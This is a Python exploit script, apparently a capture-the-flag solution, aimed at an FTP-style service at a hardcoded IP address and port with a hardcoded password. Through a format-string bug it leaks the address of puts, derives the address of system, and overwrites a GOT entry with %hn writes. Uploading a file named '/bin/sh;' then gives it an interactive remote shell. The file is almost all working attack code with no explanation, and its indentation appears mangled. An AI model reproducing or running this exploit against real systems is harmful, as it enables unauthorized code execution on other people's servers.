1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
| from zio import *
target = ('120.27.155.82',9000)
r_m = COLORED(RAW, "green")
w_m = COLORED(RAW, "red")
pwd = "rxraclhm"
def put_file(name,content):
4io.read_until('ftp>')
4io.writeline("put")
4io.read_until("upload:")
4io.writeline(name)
4io.read_until("content:")
4io.writeline(content)
def get_file(name):
4io.read_until('ftp>')
4io.writeline("get")
4io.read_until('get:')
4io.writeline(name)
def get_file2(name):
4io.writeline("get")
4io.read_until('get:')
4io.writeline(name)
def put_file2(name,content):
4io.writeline("put")
4io.read_until("upload:")
4io.writeline(name)
4io.read_until("content:")
4io.writeline(content)
pl1 = l32(0x0804A014)
pl1 += ",%7$s,"
pl2 = l32(0x0804A024)
pl2 += ",%7$s,"
pl3 = l32(0x0804A028)
pl3 += ",%7$s,"
offset_puts_to_system = 0x00065650 - 0x00040190
io = zio(target,print_read=r_m,print_write=w_m,timeout=999)
io.read_until('):')
io.writeline(pwd)
put_file("a",pl3)
get_file("a")
rec = io.read_until('>').strip()
junk1,addr,junk2 = rec.split(',')
print "[*]puts is at:%s" % (addr[0:4][::-1] or '').encode('hex')
addr = addr[0:4][::-1].encode('hex')
system_addr = hex(int(addr,16) - offset_puts_to_system)
puts_addr = hex(int(addr,16))
print "[*]system is at:" + system_addr
x = int(addr,16) - offset_puts_to_system
a,b = [(x >> i) & 0b1111111111111111 for i in range(0, 25, 16)]
print hex(a)+","+hex(b)
put_file2("c",l32(0x0804A028)+"%%%dc"%(a-4)+"%7$hn")
raw_input('$$$')
get_file("c")
put_file2("d",l32(0x0804A028+2)+"%%%dc"%(b-4)+"%7$hn")
get_file("d")
put_file2("/bin/sh;","test")
io.writeline('dir')
io.interact()
|
